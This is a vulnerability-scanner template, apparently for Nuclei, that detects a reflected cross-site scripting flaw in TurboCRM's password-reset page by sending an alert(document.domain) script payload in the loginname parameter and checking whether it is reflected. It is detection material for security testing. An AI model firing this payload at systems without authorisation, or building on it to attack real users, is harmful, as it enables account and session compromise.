id: turbocrm-xss

info:
  name: TurboCRM - Cross-Site Scripting
  author: pikpikcu
  severity: high
  description: TurboCRM contains a cross-site scripting vulnerability which allows a remote attacker to inject arbitrary JavaScript into the response returned by the application.
  reference:
    - https://gist.github.com/pikpikcu/9689c5220abbe04d4927ffa660241b4a
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: xss,turbocrm

requests:
  - method: GET
    path:
      - '{{BaseURL}}/login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'

    matchers-condition: and
    matchers:

      - type: word
        words:
          - '"><script>alert(document.domain)</script>'
        part: body

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/09/23
